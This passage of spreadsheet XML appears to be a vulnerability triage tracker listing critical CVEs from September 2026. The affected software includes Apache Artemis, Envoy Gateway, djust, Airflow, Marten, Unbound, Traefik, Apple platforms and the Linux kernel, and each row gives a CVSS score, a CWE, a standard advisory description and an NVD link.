        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr">
        <is>
          <t>apache:artemis</t>
        </is>
      </c>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr"/>
      <c r="Q112" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated network-adjacent attacker can leverage discovery to capture cluster administrative credentials during the initial cluster connection handshake.
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="S112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49364</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53713</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr"/>
      <c r="Q113" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. Prior to 1.7.4 and 1.8.1, to_absolute_normalized_path in internal/gatewayapi/luavalidator/security.lua does not collapse redundant separators before is_critical_path evaluates Lua submitted through EnvoyExtensionPolicy during default Strict validation. Linux resolves a double-slash absolute path as the corresponding single-slash path, but the validator does not match the redundant-separator form, allowing submitted Lua to read arbitrary files from the gateway controller pod. Exposed files can include Kubernetes service-account tokens, TLS certificates, and process environment data, and the disclosed credentials can provide access to sensitive Kubernetes API Server or Gateway xDS server information. This issue is fixed in versions 1.7.4 and 1.8.1.</t>
        </is>
      </c>
      <c r="S113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53713</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61594</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M114" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr"/>
      <c r="Q114" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, the live (WebSocket) transport authorizes a mount via `check_view_auth`, not Django's `View.dispatch()` chain. As a result, standard Django authorization — `LoginRequiredMixin`, `PermissionRequiredMixin`, `UserPassesTestMixin`, `@method_decorator(login_required, name="dispatch")`, and custom `dispatch()` guards — and the djust admin extension's staff gate (applied only in the HTTP `as_view` wrapper) were enforced on the initial HTTP GET but silently bypassed over WebSocket, where all events and state flow. An anonymous or under-privileged client could open a WebSocket and mount such a view — including admin list/create/change/delete — and dispatch its handlers. This is fixed in djust 1.0.7. `check_view_auth` now honors the Django `AccessMixin` family on every transport; a new system check S004 fails loud at startup on auth patterns the runtime cannot safely replay (decorator/overridden-`dispatch` forms); and the admin base mixin declares `login_required = True` + an active-staff `check_permissions` gate. As a workaround, gate views using djust's `login_required` / `permission_required` / `check_permissions` attributes (honored on all transports) rather than HTTP-only mixins/decorators.</t>
        </is>
      </c>
      <c r="S114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61594</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67593</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr">
        <is>
          <t>apache:artemis</t>
        </is>
      </c>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr"/>
      <c r="Q115" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>A remote attacker can craft an Openwire RemoveSubscriptionInfo command to cause the deletion of a queue on the Artemis broker before the connection authentication and authorization stage or at any time thereafter. 
This issue affects Apache Artemis: from 2.50.0 through 2.56.0; Apache ActiveMQ Artemis: from 1.0.0 through 2.44.0.
Users are recommended to upgrade to version 2.57.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="S115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67593</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75156</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr"/>
      <c r="Q116" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow FAB provider versions 3.7.3 through 3.8.0 do not validate the issuer or audience of Azure AD `id_token`s during OAuth login. Deployments are affected only when the FAB auth manager is configured with Azure AD as an OAuth provider. Because the signing keys are fetched from Microsoft's **multi-tenant** JWKS endpoint, an `id_token` minted in *any* Azure tenant — including one the attacker creates — passes signature verification, and the username and role assignments are then read from that attacker-controlled token. Anyone able to register an Azure tenant can therefore authenticate to the Airflow UI with no prior access to the deployment.
The fix for **CVE-2026-59243** was incomplete, and this advisory closes the remaining gap: that fix made the provider verify the `id_token` signature, but did not add issuer or audience checks. Operators who already applied the CVE-2026-59243 fix are **still affected and must upgrade again** — 3.7.3 is the release that shipped that fix, so every version containing it falls inside this affected range. Upgrade to apache-airflow-providers-fab `3.8.1` or later.</t>
        </is>
      </c>
      <c r="S116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75156</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75513</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr"/>
      <c r="Q117" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>Marten is a .NET Transactional Document DB and Event Store on PostgreSQL. From version 7.0.0 until 9.13.0, several Marten LINQ and tenant-management paths interpolate runtime, potentially attacker-controlled strings into single-quoted SQL literals without escaping or parameterization. The primary confirmed vector is a dictionary indexer key used by Where filters in src/Marten/Linq/Members/Dictionaries/DictionaryItemMember.cs. Additional affected sinks include SelectParser.cs, DatabaseScopedTenantPartitions.cs, and DeleteAllForTenant.cs reached through IEventStore.DeleteProjectionProgressAsync, while DictionaryContainsKeyFilter.cs (Newtonsoft serializer only; System.Text.Json is not affected) handles ContainsKey calls. Events/Daemon/Internals/EventLoader.cs contains a related per-tenant partition-pruning literal that the advisory identifies as a defense-in-depth sink. A crafted single quote can escape the generated literal, enabling filter or multi-tenant authorization bypass and blind data exfiltration, and deployments that permit semicolon-batched Npgsql statements may also allow data modification. This issue is fixed in version 9.13.0.</t>
        </is>
      </c>
      <c r="S117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75513</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77408</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr"/>
      <c r="Q118" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ amqp091-go is a Go AMQP 0.9.1 client. Prior to 1.13.0, the writeShortstr function in write.go casts the byte length of AMQP shortstr property values to uint8 without first rejecting values longer than 255 bytes. An application that accepts an oversized CorrelationId, ReplyTo, MessageId, Expiration, UserId, AppId, ContentType, ContentEncoding, or Type value can therefore serialize a wrapped length and only a truncated prefix, while reporting no error. The resulting silent metadata corruption can break request and reply correlation, routing, tracing, and downstream message processing. This issue is fixed in version 1.13.0.</t>
        </is>
      </c>
      <c r="S118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77408</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78299</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr"/>
      <c r="Q119" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Embedded CDT versions 6.0 to 6.7 if the CMSIS-Pack archive extracts a compromised CMSIS pack the archive extraction can extract files to locations outside of the pack, allowing writing of arbitrary files to other locations on disk.</t>
        </is>
      </c>
      <c r="S119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78299</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80424</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr"/>
      <c r="Q120" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to create arbitrary files due to path traversal during archive extraction.</t>
        </is>
      </c>
      <c r="S120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80424</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81642</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>sep@nlnetlabs.nl</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr"/>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr"/>
      <c r="Q121" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>In NLnet Labs Unbound up to and including 1.26.0, a vulnerability was found in the DNSSEC validator that enables denial of service and possible remote code execution as a result of digesting DNSKEYs. A DNSKEY with an owner compression pointer to its own RDATA can overflow the digest buffer. Remote code execution is possible through attacker controlled data. An adversary can exploit the vulnerability by controlling a malicious zone and querying a vulnerable Unbound.</t>
        </is>
      </c>
      <c r="S121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81642</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84625</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr"/>
      <c r="Q122" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with additional sandbox restrictions. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, visionOS 27, watchOS 27. An app may be able to fingerprint the user.</t>
        </is>
      </c>
      <c r="S122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84625</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85597</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr">
        <is>
          <t>traefik:traefik</t>
        </is>
      </c>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr"/>
      <c r="Q123" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>Traefik before v2.11.55 and v3.0.0 through v3.7.10 contain a TLS option conflict resolution vulnerability that allows unauthenticated attackers to bypass client-certificate authentication by creating conflicting TLS options on multi-host routers. Attackers can reach protected backends by exploiting shared TLS resolution across multiple hostnames in a single router rule, causing the strict mTLS requirement to fall back to default options for all hosts.</t>
        </is>
      </c>
      <c r="S123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85597</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86881</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr"/>
      <c r="Q124" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>A certificate validation issue was addressed with improved certificate validation. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An attacker with a compromised intermediate certificate authority may be able to issue certificates with arbitrary extended key usages.</t>
        </is>
      </c>
      <c r="S124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86881</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89779</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr"/>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: validate ef-&gt;size covers the record's name and value
When an EA record has a non-zero ef-&gt;size, ntfs_read_ea() only checks
that the record fits in the remaining buffer (ea_size &gt; bytes), not that
ef-&gt;size is large enough to hold the record's own name_len + 1 + elength.
A crafted image can pass validation with, e.g., ef-&gt;size = 24 but
elength = 0xffff. ntfs_get_ea() then trusts elength and copies it out of
the undersized record, reading past the kmalloc(info-&gt;size) allocation
and leaking heap memory to userspace via getxattr():
 BUG: KASAN: slab-out-of-bounds in ntfs_get_ea (fs/ntfs3/xattr.c:302)
 Read of size 65535 at addr ffff888100794550 by task exploit
  __asan_memcpy (mm/kasan/shadow.c:105)
  ntfs_get_ea (fs/ntfs3/xattr.c:302)
  ntfs_getxattr (fs/ntfs3/xattr.c:848)
  __vfs_getxattr (fs/xattr.c:441)
  vfs_getxattr (fs/xattr.c:474)
  do_getxattr (fs/xattr.c:800)
  path_getxattrat (fs/xattr.c:868)
  do_syscall_64 (arch/x86/entry/syscall_64.c:94)
 The buggy address is located 80 bytes inside of
  allocated 84-byte region in cache kmalloc-96
Compute the size the record needs and require ef-&gt;size to cover it.</t>
        </is>
      </c>
      <c r="S125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89779</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89786</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr"/>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext4: fix out-of-bounds read in ext4_read_inline_dir()
ext4_read_inline_dir() can read a dirent header past the end of its inline
